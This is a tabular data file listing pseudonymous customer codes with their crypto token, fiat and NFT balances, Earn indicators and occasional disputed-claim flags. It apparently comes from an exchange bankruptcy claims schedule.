| 07340927 | | AAVE[.57237158], ALGO[5.92295315], BTC[0.00263511], DOGE[1830.55921599], ETH[.05565467], ETHW[.05496317], GRT[79.312045], KSHIB[932.04400752], LINK[1.10213818], LTC[0.79720821], MATIC[46.658347], MKR[0], NEAR[2.64891279], NFT[494146064562163861/Humpty Dumpty #425][1], SHIB[5381089.87337005], SOL[1.28238485], SUSHI[9.43483717], TRX[1], UNI[2.17706928], USD[0.01], YFI[0.00608758] | Yes | |
| 07340928 | | TRX[1], USD[0.00] | | |
| 07340929 | | USD[0.00] | | |
| 07340930 | | DOGE[.703], USD[0.01] | | |
| 07340931 | | DOGE[358.40909712], USD[10.00] | | |
| 07340932 | | BRZ[0], DOGE[0], ETH[0], SOL[0.00250239], USD[0.01], USDT[0] | | |
| 07340933 | | USD[10.00] | | |
| 07340934 | | USD[10.00] | | |
| 07340935 | | CUSDT[2], DOGE[2.00457992], TRX[1], USD[0.07] | | |
| 07340936 | | USD[10.00] | | |
| 07340937 | | SHIB[1], USD[0.07] | Yes | |
| 07340938 | | DOGE[55534.19508466], SHIB[15979438.14394445], USD[703.87] | Yes | |
| 07340939 | | USD[10.00] | | |
| 07340940 | | USD[10.00] | | |
| 07340941 | | USD[10.00] | | |
| 07340942 | | BCH[0], CUSDT[2], DOGE[1.89934572], ETH[0], LTC[0], SOL[0], TRX[1], USD[0.00] | | |
| 07340944 | | DOGE[139.32126857], USD[0.00] | | |
| 07340946 | | BTC[.02036762], CUSDT[9], DOGE[307.5469326], LINK[.34448271], LTC[.75898319], SHIB[2], SOL[1.05405799], TRX[2], USD[0.01] | Yes | |
| 07340947 | | SHIB[303678.42982131], USD[0.01] | Yes | |
| 07340948 | | BRZ[0], DOGE[1], USD[0.00] | | |
| 07340949 | | USD[39.32] | | |
| 07340950 | | BTC[.00010058], ETH[.00282223], ETHW[.00282223], USD[0.00] | | |
| 07340951 | | BAT[1], BTC[0.49564131], SHIB[1], USD[0.00] | Yes | |
| 07340952 | | BRZ[1], DOGE[59.99995741], USD[0.00] | | |
| 07340953 | | USD[10.00] | | |
| 07340954 | | USD[10.00] | | |
| 07340955 | | USD[10.00] | | |
| 07340956 | | BCH[.00005], BTC[.00002231], CUSDT[1], DOGE[5.03361373], TRX[.25], USD[2.74] | Yes | |
| 07340957 | | BAT[6.05601], BRZ[3], BTC[0], CUSDT[140.95955678], DOGE[0], SHIB[4], TRX[0], USD[0.00], USDT[1] | | |
| 07340958 | | DOGE[1], TRX[2], USD[0.00] | | |
| 07340959 | Contingent, Disputed | USD[0.00] | | |
| 07340960 | | DOGE[.0018827], USD[8.57] | | |
| 07340961 | | BTC[.00053877] | | |
| 07340962 | | BRZ[3], CUSDT[20], DOGE[1], ETH[.14047491], ETHW[.14047491], GRT[3], TRX[13], USD[0.00], USDT[1] | | |
| 07340963 | | USD[10.00] | | |
| 07340964 | | USD[0.01] | | |
| 07340965 | | USD[10.00] | | |
| 07340966 | | USD[0.01] | | |
| 07340967 | | USD[10.00] | | |
| 07340968 | | USD[10.00] | | |
| 07340969 | | DOGE[351.45956235], USD[0.00] | Yes | |
| 07340970 | | USD[10.00] | | |
| 07340971 | | BRZ[1], CUSDT[1], DOGE[1.00003786], TRX[3], USD[0.01] | | |
| 07340972 | | CUSDT[2], TRX[2], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07340973 | | BAT[.00004249], BRZ[1], CUSDT[11], DOGE[1.00002503], TRX[.00004045], USD[0.00] | | |
| 07340975 | | USD[0.00] | | |
| 07340976 | | BRZ[1], CUSDT[7], GRT[1], SHIB[21314540.31214462], TRX[3], USD[0.00], USDT[1] | | |
| 07340978 | | USD[0.00] | | |
| 07340979 | | BRZ[1], CUSDT[13], DOGE[0], ETH[0], TRX[2], USD[0.00] | | |
| 07340980 | | GRT[6.93360899], USD[0.00] | | |
| 07340981 | | USD[10.00] | | |
| 07340982 | | USD[10.00] | | |
| 07340983 | | USD[10.00] | | |
| 07340984 | | USD[10.00] | | |
| 07340985 | | DOGE[1.63416059], ETH[.00000001], ETHW[0], SHIB[201043413.26343270], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07340986 | | USD[10.00] | | |
| 07340987 | | DOGE[1000.70621109], USD[0.00] | | |
| 07340988 | | USD[0.01] | | |
| 07340989 | | BRZ[1], CUSDT[2], DOGE[0], TRX[1], USD[0.00] | | |
| 07340990 | | USD[10.00] | | |
| 07340992 | | CUSDT[1], DOGE[1], SHIB[0], USD[0.01] | | |
| 07340993 | | USD[10.00] | | |
| 07340994 | | USD[10.00] | | |
| 07340995 | | USD[10.00] | | |
| 07340996 | | BTC[0], USD[0.00] | | |
| 07340997 | | USD[10.00] | | |
| 07340998 | | BAT[1], BRZ[1], BTC[.00920035], CUSDT[1], USD[0.00] | | |
| 07340999 | | CUSDT[3], DOGE[.00017301], TRX[2], USD[0.00] | | |
| 07341000 | | USD[10.00] | | |
| 07341001 | | DOGE[3.1725311], USD[0.01] | | |
| 07341002 | | USD[10.00] | | |
| 07341003 | | BRZ[1], USD[0.30] | | |
| 07341005 | | USD[0.00] | | |
| 07341007 | | BRZ[1], USD[0.00] | | |
| 07341008 | | USD[0.01] | | |
| 07341009 | | USD[10.00] | | |
| 07341010 | | BCH[.02136662], BRZ[2], CUSDT[8], DOGE[72.73300511], GRT[1.00498957], SHIB[2], USD[0.00] | Yes | |
| 07341011 | | DOGE[1.00009314], USD[0.01] | | |
| 07341012 | | BRZ[2], TRX[1], USD[0.00] | Yes | |
| 07341013 | | USD[10.00] | | |
| 07341014 | | CUSDT[11], TRX[1], USD[0.00] | Yes | |
| 07341016 | | DOGE[1], USD[32.54] | | |
| 07341017 | | DOGE[25.45733854], USD[0.00] | | |
| 07341018 | | CUSDT[1], DOGE[351.23098707], USD[0.01] | | |
| 07341019 | | USD[10.00] | | |
| 07341020 | | USD[0.01], USDT[0] | | |
| 07341021 | | ETH[0], TRX[.000001], USD[0.00], USDT[0.00002214] | | |
| 07341022 | | GRT[4.98857523], USD[0.00] | | |
| 07341023 | | USD[10.00] | | |
| 07341024 | Contingent, Disputed | BRZ[0], BTC[0], CUSDT[1], DOGE[0], TRX[2], USD[0.00] | | |
| 07341025 | | USD[25.90], USDT[0] | | |
| 07341026 | | DOGE[1], USD[0.00] | | |
| 07341027 | | USD[25.37] | | |
| 07341028 | | BRZ[1], CUSDT[1], GRT[1], TRX[1], USD[0.00] | | |
| 07341029 | | USD[10.00] | | |
| 07341030 | | CUSDT[1], USD[10.33] | | |
| 07341031 | | ALGO[.88572862], KSHIB[1368.63], NFT (374722850922081886/The Hill by FTX #2670)[1], USD[0.00] | | |
| 07341032 | | USD[60.00] | | |
| 07341033 | | USD[10.00] | | |
| 07341034 | | DOGE[135.30225944], USD[0.00] | Yes | |
| 07341035 | | USD[10.00] | | |
| 07341036 | | CUSDT[5], DOGE[1], TRX[4], USD[0.00], USDT[2.20591019] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07341037 | | DOGE[0], USD[0.00], USDT[0] | | |
| 07341038 | | USD[10.00] | | |
| 07341039 | | BTC[0], USD[0.00] | Yes | |
| 07341042 | | BRZ[1], CUSDT[2], USD[0.00] | Yes | |
| 07341043 | | CUSDT[2], USD[0.00] | | |
| 07341044 | | USD[10.00] | | |
| 07341045 | | DOGE[4.74542765], USD[0.00] | Yes | |
| 07341046 | | USD[10.00] | | |
| 07341047 | | USD[10.00] | | |
| 07341048 | | DOGE[1], USD[10.00] | | |
| 07341049 | | CUSDT[1], DOGE[.00000585], USD[0.01] | | |
| 07341050 | | USD[0.00] | | |
| 07341051 | | BRZ[1], BTC[0], CUSDT[12], DOGE[0], ETH[0], TRX[71.69932805], USD[3.23] | | |
| 07341052 | | USD[10.00] | | |
| 07341054 | | USD[10.00] | | |
| 07341056 | | BRZ[0], BTC[0], CUSDT[2], DOGE[0], GRT[0], SOL[0], USD[0.00], USDT[0] | | |
| 07341057 | | AVAX[.03716735], DOGE[0], LINK[0], SOL[0], USD[2.04], USDT[0] | | |
| 07341058 | | USD[10.00] | | |
| 07341059 | | BRZ[0], DOGE[0], ETH[0], TRX[0], USD[0.05], USDT[.00000001] | Yes | |
| 07341060 | | USD[10.00] | | |
| 07341061 | | BRZ[1], USD[0.00] | | |
| 07341062 | | USD[10.00] | | |
| 07341063 | | USD[10.00] | | |
| 07341065 | | USD[10.00] | | |
| 07341066 | | USD[10.00] | | |
| 07341067 | | USD[10.00] | | |
| 07341068 | | USD[219.71], USDT[1.09720575] | Yes | |
| 07341069 | | BAT[0], BTC[0], DOGE[0.94248919], GRT[0], LTC[0], USD[0.00], USDT[0] | | |
| 07341070 | | CUSDT[1], DOGE[4203.36375151], SOL[1.04463691], TRX[1], USD[0.00] | | |
| 07341071 | | CUSDT[5], TRX[22.21596944], USD[0.69] | | |
| 07341072 | | USD[10.00] | | |
| 07341074 | | DOGE[13.74198907], USD[0.00] | | |
| 07341075 | | CUSDT[1], DOGE[1], USD[0.00] | | |
| 07341076 | | LTC[.05120419], TRX[1], USD[0.00] | Yes | |
| 07341077 | | BTC[0], CUSDT[2], DOGE[0], LINK[.0000176], USD[0.00], USDT[0] | | |
| 07341078 | | CUSDT[2], DOGE[721.71952132], TRX[1], USD[0.00] | | |
| 07341079 | | BRZ[1], BTC[0], CUSDT[0], DOGE[2], ETH[0], GRT[0], KSHIB[0], LTC[0], NFT (3367392269601750005/Earl Campbell's Playbook: Rice vs. Texas - October 1st, 1977 #83)[1], NFT (533888720016065366/Alberts 500th HR)[1], SHIB[8969476.93328627], SOL[0], TRX[0], USD[0.00], USDT[0], YFI[0] | Yes | |
| 07341080 | | BTC[.000269], CUSDT[2575.37521092], DOGE[.95964051], TRX[216.28992027], USD[-35.13] | Yes | |
| 07341081 | | USD[10.00] | | |
| 07341082 | | DOGE[14.47374749], USD[0.00] | | |
| 07341084 | | BAT[2], CUSDT[6], GRT[1], TRX[4], USD[0.00] | | |
| 07341085 | | BRZ[1], CUSDT[10], DOGE[1.00004129], ETH[.00000044], ETHW[.00000044], LINK[.00003088], LTC[.00002294], MATIC[9.11447297], MKR[.00000065], SOL[.00019775], TRX[1], USD[0.00] | Yes | |
| 07341086 | | CUSDT[5063.41195143], DOGE[483.37297077], USD[0.00] | Yes | |
| 07341087 | | USD[10.00] | | |
| 07341088 | | USD[10.00] | | |
| 07341089 | | USD[10.00] | | |
| 07341090 | | BAT[3], BRZ[2], BTC[0], CUSDT[6], DOGE[7], ETHW[3.68696679], SHIB[1301239.17436564], SOL[1], TRX[5], USD[0.00], USDT[1] | | |
| 07341091 | | USD[10.00] | | |
| 07341093 | | USD[0.01] | | |
| 07341094 | | USD[0.01] | | |
| 07341095 | | USD[10.00] | | |
| 07341096 | | GRT[19.30415873], USD[0.00] | Yes | |
| 07341097 | | AVAX[1.04039557], BRZ[1], BTC[.00000007], CUSDT[3], GRT[489.72978438], LINK[4.33751955], LTC[.39502924], MATIC[.37296981], SHIB[25629.90932454], SUSHI[27.82710876], TRX[775.60395923], USD[0.00], YFI[.00212266] | Yes | |
| 07341098 | | USD[10.00] | | |
| 07341099 | | ETH[.00078900], ETHW[.00078900], USD[0.00] | | |
| 07341100 | | DOGE[4312.40581281], TRX[3], USD[1195.55] | | |
| 07341102 | | BRZ[0], CUSDT[2], GRT[1.00498957], TRX[297.03259232], USD[0.00], USDT[0] | Yes | |
| 07341103 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07341104 | | USD[10.00] | | |
| 07341105 | | BRZ[0], BTC[0], DOGE[0], ETH[0], SOL[0], USD[0.14] | | |
| 07341106 | | USD[10.00] | | |
| 07341108 | | DOGE[140.82300365], USD[0.22] | | |
| 07341109 | | AVAX[0], BTC[0], ETH[0.00001453], ETHW[0.00001453], LTC[0], USD[0.00] | | |
| 07341110 | | USD[10.00] | | |
| 07341111 | | USD[10.00] | | |
| 07341112 | | USD[10.00] | | |
| 07341113 | | USD[10.00] | | |
| 07341114 | | USD[10.00] | | |
| 07341115 | | USD[10.00] | | |
| 07341116 | | USD[10.00] | | |
| 07341117 | | CUSDT[2], DOGE[42.12965858], USD[0.00] | | |
| 07341118 | | USD[0.03] | | |
| 07341119 | | BAT[6.70447076], BRZ[27.92078337], CUSDT[244.61481805], DOGE[188.96670633], GRT[7.82425124], LINK[.03568307], NFT (293273744368646345/Hall of Fantasy League #160)[1], NFT (395904567997714195/Hall of Fantasy League #162)[1], NFT (556896737132493444/Hall of Fantasy League #158)[1], SOL[.52725794], SUSHI[.06322784], TRX[269.75446618], UNI[.03429417], USD[1.01] | | |
| 07341121 | | CUSDT[8], USD[0.00] | | |
| 07341122 | | USD[10.00] | | |
| 07341123 | | BRZ[1], CUSDT[2], USD[0.00] | Yes | |
| 07341124 | | USD[0.64] | Yes | |
| 07341125 | | UNI[.4404801], USD[0.00] | | |
| 07341126 | | CUSDT[1], DOGE[1.31055578], USD[0.01] | | |
| 07341127 | | USD[2.09], USDT[0] | Yes | |
| 07341128 | | CUSDT[1], TRX[1], USD[0.00] | | |
| 07341130 | | BTC[0], DAI[0], USD[0.01], YFI[0] | | |
| 07341131 | | USD[10.00] | | |
| 07341132 | | BF_POINT[200], USD[0.24] | | |
| 07341133 | | BAT[2.07912771], BRZ[5.00968973], BTC[0], CUSDT[15], DOGE[10.34793121], ETH[.46629342], ETHW[.46609746], GRT[0], MKR[.14560846], NFT (442807351494650238/Red Panda #2073)[1], NFT (575060566482346455/Fancy Frenchies #1822)[1], SHIB[1], SOL[0], SUSHI[214.07818650], TRX[11.15818543], UNI[52.35857946], USD[0.00] | Yes | |
| 07341134 | | USD[10.00] | | |
| 07341135 | | BRZ[0], DOGE[0], ETH[0], USD[10.00] | | |
| 07341136 | | DOGE[204.0285096], USD[0.00] | Yes | |
| 07341137 | | USD[10.00] | | |
| 07341138 | | BTC[0], NFT (301125095800322286/MagicEden Vaults)[1], NFT (414808113673567620/MagicEden Vaults)[1], NFT (425514602479712862/Golden bone pass)[1], NFT (428419502714984559/MagicEden Vaults)[1], NFT (444786826282917715/Frog #7603)[1], NFT (485920506867861520/MagicEden Vaults)[1], SOL[17.164], USD[2.87], WBTC[0] | | |
| 07341139 | | USD[10.00] | | |
| 07341140 | | CUSDT[1], LINK[.73775483], USD[0.00] | Yes | |
| 07341142 | | USD[10.00] | | |
| 07341143 | | DOGE[152.24308559], USD[0.00] | Yes | |
| 07341144 | | AVAX[78.86542441], BRZ[0], BTC[0], DOGE[4506.38034573], ETH[0], ETHW[0], GRT[0], LINK[45.38392179], LTC[17.07053488], MATIC[949.70504066], SHIB[2], SOL[5.8458974], TRX[1], USD[6.00] | Yes | |
| 07341145 | | USD[10.00] | | |
| 07341146 | | DOGE[733.12575691], SHIB[164880.46166529], SOL[.12289651], USD[3.00] | | |
| 07341147 | | USD[10.00] | | |
| 07341149 | | BTC[.00112647], DOGE[1], USD[10.00] | | |
| 07341150 | | USD[10.00] | | |
| 07341151 | | USD[10.00] | | |
| 07341152 | | LINK[124.51784295], USD[2.51], USDT[0] | Yes | |
| 07341153 | | DOGE[1], USD[0.01] | | |
| 07341154 | | USD[10.00] | | |
| 07341155 | | BRZ[1], BTC[.00003858], CUSDT[13], DOGE[3.000548], LINK[13.89788582], SUSHI[43.48755821], TRX[1.00026555], UNI[17.39341821], USD[0.00], YFI[.00772424] | Yes | |
| 07341156 | | DOGE[238.48227581], USD[0.00] | Yes | |
| 07341157 | | BRZ[1], CUSDT[1], DOGE[2], USD[0.00] | | |
| 07341158 | | BTC[.00259012], DOGE[3702.44035], SUSHI[.4924], USD[0.64] | | |
| 07341159 | | USD[0.00] | | |
| 07341160 | | CUSDT[1], DOGE[0], USD[0.00], USDT[0] | Yes | |
| 07341161 | | USD[10.00] | | |
| 07341162 | | AAVE[0.70819954], AVAX[.11780293], BAT[0], BCH[.07390456], BRZ[6.42113431], BTC[0.00017718], CUSDT[34], DOGE[12.4467678], ETH[0.10037957], ETHW[0.09160318], GRT[22.31513772], LINK[32.37682245], LTC[.63250537], MATIC[34.65715293], SHIB[3315363.71355816], SOL[0.22067140], SUSHI[4.84107330], TRX[20.58233592], UNI[3.23376528], USD[149.03], USDT[3.28223715], YFI[.005093316] | Yes | |
| 07341163 | | USD[10.00] | | |
| 07341164 | | BTC[0.09125124], CUSDT[1], DOGE[1], TRX[1], USD[0.00] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07341165 | | BTC[0.00010621], DOGE[40.19238964], TRX[90.9112332], USD[0.00] | Yes | |
| 07341166 | | CUSDT[1], USD[0.01] | | |
| 07341167 | | USD[10.00] | | |
| 07341168 | | DOGE[534.69829014], USD[10.00] | | |
| 07341169 | | USD[10.00] | | |
| 07341170 | | BRZ[0], DOGE[0], USD[0.00] | | |
| 07341171 | | BAT[0], BF_POINT[300], BRZ[0], BTC[0], CUSDT[0], DOGE[0], ETH[0], GRT[0], LTC[0], TRX[3.82867968], USD[0.00], USDT[0], YFI[0] | | |
| 07341172 | | BCH[.00016902], CUSDT[5], DOGE[1.42882965], TRX[5], USD[11.16] | Yes | |
| 07341173 | | BRZ[1], BTC[.0043384], CUSDT[10], DOGE[3568.72591488], ETH[.90218886], ETHW[.90180158], SUSHI[1.81754524], TRX[588.82561545], USD[0.33] | Yes | |
| 07341174 | | CUSDT[.72880212], USD[0.16] | | |
| 07341176 | | USD[10.00] | | |
| 07341177 | | CUSDT[1], DOGE[286.87451226], TRX[1], USD[0.00] | Yes | |
| 07341178 | | USD[10.00] | | |
| 07341179 | | DOGE[769.13899701], TRX[2], USD[0.00] | | |
| 07341180 | | NFT (560004897031337051/Coachella x FTX Weekend 1 #26542)[1], USD[10.00] | | |
| 07341181 | | USD[0.00] | Yes | |
| 07341182 | | BTC[0], TRX[1], USD[0.61] | Yes | |
| 07341183 | | USD[10.00] | | |
| 07341184 | | USD[10.00] | | |
| 07341185 | | USD[10.00] | | |
| 07341186 | | DOGE[1], TRX[1], USD[0.00] | | |
| 07341187 | | USD[10.00] | | |
| 07341188 | | USD[10.00] | | |
| 07341189 | | USD[0.00], USDT[9.94805028] | | |
| 07341190 | | BTC[0], ETH[0], SOL[0], USD[0.00] | | |
| 07341191 | | USD[10.00] | | |
| 07341193 | | BAT[0], BF_POINT[100], BRZ[2], BTC[0], DOGE[4], ETH[0], ETHW[0], NEAR[101.67262331], NFT (290602709023015789/Doak Walker's Playbook: SMU vs. Santa Clara - September 27, 1947 #23)[1], NFT (321778665538532676/Tommy Gun)[1], NFT (323949722217558736/StarAtlas Anniversary)[1], NFT (326658582541907843/Golden bone pass)[1], NFT (349239007764742383/#6682)[1], NFT (362243756697646307/StarAtlas Anniversary)[1], NFT (368862439922555061/Scene #0279 | Timeline #1)[1], NFT (381176497548296064/StarAtlas Anniversary)[1], NFT (387016944493841084/Frog #2978)[1], NFT (415837826976532516/StarAtlas Anniversary)[1], NFT (433413871254134242/Shannon Sharpe's Playbook: Baltimore Ravens vs. Denver Broncos - December 31, 2000 #15)[1], NFT (446462790500556008/Cyber Frogs Ramen)[1], NFT (467866399686849538/StarAtlas Anniversary)[1], NFT (481439448861512913/StarAtlas Anniversary)[1], NFT (483099868790555669/StarAtlas Anniversary)[1], NFT (512384554441912121/Joe Theismann's Playbook: New York Giants vs. Washington - October 20, 1974 #16)[1], NFT (533462083328802260/StarAtlas Anniversary)[1], NFT (537172425119404544/Frog #4342)[1], NFT (550479559313150620/Earl Campbell's Playbook: Texas vs. Houston - November 5th, 1977 #31)[1], NFT (563816262345830485/Earl Campbell's Playbook: Rice vs. Texas - October 1st, 1977 #46)[1], SHIB[294.26566931], SOL[0.00034065], SUSHI[0], TRX[2], USD[0.06] | Yes | |
| 07341194 | | USD[10.00] | | |
| 07341195 | | USD[10.00] | | |
| 07341196 | | DOGE[.00004815], USD[161.56] | | |
| 07341198 | | USD[0.00] | | |
| 07341200 | | USD[8.41] | | |
| 07341201 | | DOGE[15.52457826], USD[0.00] | | |
| 07341202 | | USD[10.00] | | |
| 07341203 | | USD[0.00] | | |
| 07341204 | | BRZ[1], CUSDT[2], DOGE[.00006206], TRX[3], USD[0.01], USDT[1.10934663] | Yes | |
| 07341206 | | USD[10.00] | | |
| 07341207 | | USD[10.00] | | |
| 07341208 | | BTC[0], CUSDT[3], DOGE[0], ETH[0], SHIB[0], TRX[1], USD[0.00], USDT[0] | | |
| 07341209 | | USD[10.00] | | |
| 07341210 | | USD[10.00] | | |
| 07341211 | | SHIB[589418.85317886], TRX[0], USD[0.00] | Yes | |
| 07341212 | | BTC[.0284856], CUSDT[2], ETH[.6690048], ETHW[.6690048], SUSHI[320.0779234], TRX[1], USD[0.00], USDT[1] | | |
| 07341213 | | USD[10.00] | | |
| 07341214 | | USD[10.91] | Yes | |
| 07341215 | | BRZ[1], ETH[0], USD[0.00] | Yes | |
| 07341216 | | USD[10.00] | | |
| 07341218 | | ETH[.0000053], ETHW[.0000053], USD[0.00] | | |
| 07341219 | | USD[10.00] | | |
| 07341220 | | BRZ[0], DOGE[.01035533], USD[0.00] | | |
| 07341221 | | USD[0.00] | | |
| 07341222 | | BAT[1.0165555], BRZ[1], CUSDT[13], DOGE[1], MATIC[.00358504], TRX[1], USD[0.00], USDT[0.00000006] | Yes | |
| 07341223 | | BAT[1.00846482], CUSDT[3], DOGE[129.69591131], SHIB[1], TRX[256.96103827], USD[0.00] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07341224 | | DOGE[1], TRX[1], USD[0.01] | Yes | |
| 07341225 | | DOGE[0], GRT[0], LINK[0], PAXG[0], SUSHI[0], TRX[0], USD[0.00] | Yes | |
| 07341226 | | USD[10.00] | | |
| 07341227 | | BAT[1], BRZ[1], USD[0.00] | | |
| 07341228 | | BAT[1], CUSDT[1], DOGE[.16560948], ETH[.00048456], ETHW[.00048456], TRX[3], USD[5.18] | | |
| 07341229 | | BAT[0], BCH[0], BRZ[0], BTC[0], CAD[0.63], DAI[0], DOGE[0], ETH[0], GRT[0], LINK[0], LTC[0], PAXG[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.01], USDT[0.00000001], YFI[0] | | |
| 07341230 | | BTC[.0002219], DOGE[1], USD[0.00] | Yes | |
| 07341231 | | CUSDT[2], USD[7.08] | Yes | |
| 07341232 | | TRX[1], USD[0.00] | | |
| 07341233 | | BRZ[1], TRX[2], USD[7.35] | | |
| 07341235 | | USD[10.00] | | |
| 07341236 | | BAT[64.05761712], BRZ[3], CUSDT[7], DOGE[1], GRT[12.15475929], TRX[6], USD[0.00] | Yes | |
| 07341237 | | USD[10.00] | | |
| 07341238 | | USD[10.00] | | |
| 07341239 | | DOGE[45435.33992992], TRX[1], USD[10.00] | | |
| 07341240 | | SHIB[0], USD[0.00] | Yes | |
| 07341241 | | BTC[.00193702], CUSDT[3], DOGE[8849.85516319], GRT[1], USD[0.00] | | |
| 07341242 | | USD[0.00] | | |
| 07341243 | | USD[10.00] | | |
| 07341244 | | USD[10.00] | | |
| 07341245 | | USD[10.00] | | |
| 07341246 | | BTC[0], CUSDT[5.00006008], DOGE[0.00000199], TRX[1], USD[0.01] | | |
| 07341247 | | CUSDT[6], DOGE[0], TRX[1], USD[0.00] | | |
| 07341248 | | USD[10.00] | | |
| 07341250 | | BTC[.10581942], DOGE[607317.49266913], ETH[1.46634229], ETHW[1.46591999], LTC[14.42035783], SHIB[14542478.75431814], TRX[3215.3949484], USD[1621.84], USDT[0] | Yes | |
| 07341251 | | BRZ[1], DOGE[1], TRX[3.52641725], USD[0.01] | | |
| 07341252 | | BRZ[1], DOGE[0], SHIB[1], USD[8438.13], USDT[0.00000001] | Yes | |
| 07341253 | | USD[0.00] | | |
| 07341254 | | BRZ[1], BTC[.00293813], CUSDT[1], DOGE[0], TRX[1], USD[0.00] | | |
| 07341255 | | BRZ[3], CUSDT[5], USD[0.00] | | |
| 07341256 | | USD[0.00] | | |
| 07341257 | | CUSDT[1], DOGE[542.9948225], TRX[12.05984305], USD[0.00] | | |
| 07341258 | | BRZ[500.57568539], CUSDT[1], USD[0.00] | | |
| 07341259 | | BAT[1], BRZ[1], CUSDT[2], GRT[1], TRX[2], USD[0.01] | | |
| 07341260 | | USD[10.00] | | |
| 07341262 | | BCH[.10265481], BTC[.00126367], CUSDT[3], DOGE[47.04825138], ETH[.02321413], ETHW[.02292685], LINK[.3381183], LTC[.14539978], USD[-10.78] | Yes | |
| 07341263 | | BRZ[1], CUSDT[2], DOGE[27.51060329], TRX[1], USD[0.01] | | |
| 07341264 | | USD[10.00] | | |
| 07341265 | | DOGE[1], USD[0.00] | | |
| 07341268 | | NFT (301870004467889446/Entrance Voucher #17762)[1], SOL[0], USD[0.06] | | |
| 07341269 | | USD[10.00] | | |
| 07341270 | | USD[0.00] | | |
| 07341271 | | USD[10.00] | | |
| 07341272 | | BTC[.00021243], USD[0.00] | Yes | |
| 07341273 | | SOL[1], TRX[1], USD[2774.48] | | |
| 07341275 | | BCH[0], BTC[0], DOGE[0], USD[0.00] | Yes | |
| 07341276 | | DOGE[468.01626427], USD[0.00] | | |
| 07341277 | | DOGE[96.72736479], LINK[0], PAXG[0], USD[10.00], USDT[1] | | |
| 07341278 | | USD[10.00] | | |
| 07341279 | | CUSDT[1], DOGE[0], TRX[1], USD[0.00] | | |
| 07341282 | | CUSDT[2], DOGE[106.01192316], TRX[159.13721946], USD[0.00], USDT[0] | | |
| 07341283 | | USD[10.00] | | |
| 07341284 | | BRZ[1], CUSDT[1], DOGE[98.68000643], SOL[0], USD[0.00] | Yes | |
| 07341286 | | CUSDT[1], DOGE[2285.93518255], USD[0.00] | Yes | |
| 07341287 | | USD[10.00] | | |
| 07341288 | | USD[10.00] | | |
| 07341289 | | BRZ[4], BTC[0], CUSDT[5], DOGE[0], ETH[0.00000079], ETHW[0.00000079], GRT[1.00367791], SOL[0], TRX[9.01102039], USD[0.00], USDT[1.09052273] | Yes | |
| 07341290 | | LINK[.30806433], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07341291 | | USD[10.00] | | |
| 07341292 | | USD[0.00] | | |
| 07341293 | | BTC[0], USD[0.00], USDT[0] | Yes | |
| 07341294 | | USD[10.00] | | |
| 07341295 | | USD[10.00] | | |
| 07341296 | | USD[10.00] | | |
| 07341297 | | BRZ[2], CUSDT[7], DOGE[51.02321414], GRT[1], TRX[2], USD[0.73] | | |
| 07341298 | | USD[10.00] | | |
| 07341299 | | USD[10.00] | | |
| 07341300 | | USD[10.00] | | |
| 07341301 | | USD[10.00] | | |
| 07341302 | | BTC[.00085] | | |
| 07341303 | | USD[10.00] | | |
| 07341304 | | SHIB[362318.84057971], USD[0.00] | | |
| 07341305 | | DOGE[172.35994547], USD[0.00] | | |
| 07341306 | | BTC[.00000007], USD[0.00], USDT[0.00000001] | | |
| 07341307 | | BRZ[0], TRX[0], USD[0.00] | | |
| 07341308 | | BRZ[1], DOGE[.00001915], TRX[1], USD[0.00], USDT[1] | | |
| 07341309 | | CUSDT[1], TRX[2637.55300492], USD[110.00] | | |
| 07341310 | | USD[10.00] | | |
| 07341311 | | DOGE[359.4124182], TRX[88.36755951], USD[5.00] | | |
| 07341312 | | CUSDT[10], DOGE[0], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07341314 | | USD[10.00] | | |
| 07341315 | | BRZ[0], BTC[0], USD[10.00], USDT[0] | | |
| 07341316 | | CUSDT[1], DOGE[.00018108], TRX[1], USD[0.01] | | |
| 07341318 | | BAT[1], BTC[0], DOGE[0], USD[0.00] | | |
| 07341319 | Contingent, Disputed | BAT[0], BRZ[0], BTC[0], CUSDT[9], DOGE[105.61642945], GRT[1], LTC[0], SOL[0], SUSHI[0], TRX[4], USD[0.00] | | |
| 07341320 | | USD[10.00] | | |
| 07341321 | | DOGE[1.8445072], USD[0.00], USDT[0] | | |
| 07341322 | | USD[10.00] | | |
| 07341323 | | DOGE[0], SHIB[156928.49524747], USD[0.00] | Yes | |
| 07341324 | | USD[10.00] | | |
| 07341325 | | USD[10.00] | | |
| 07341326 | | USD[0.00] | | |
| 07341327 | | BTC[0], CUSDT[6], DOGE[7952.97501529], ETH[0], ETHW[0], USD[0.00] | | |
| 07341328 | | USD[0.00] | | |
| 07341329 | | LINK[0], USD[0.44] | | |
| 07341330 | | KSHIB[7.52533956], USD[0.00] | Yes | |
| 07341331 | | USD[10.00] | | |
| 07341332 | | BAT[2], BRZ[1], BTC[0], CUSDT[1], DOGE[0], ETH[0], ETHW[0], TRX[4.00803043], USD[0.00] | | |
| 07341333 | | CUSDT[1], DOGE[1], USD[0.01] | | |
| 07341334 | | BTC[0.00001180], DOGE[.3222], LINK[.05256], LTC[.00826232], MATIC[3.64], SOL[.00651], USD[3.25], USDT[0.00512994] | | |
| 07341335 | | BRZ[1], CUSDT[2.9793575], DOGE[2105.76999644], USD[0.00] | Yes | |
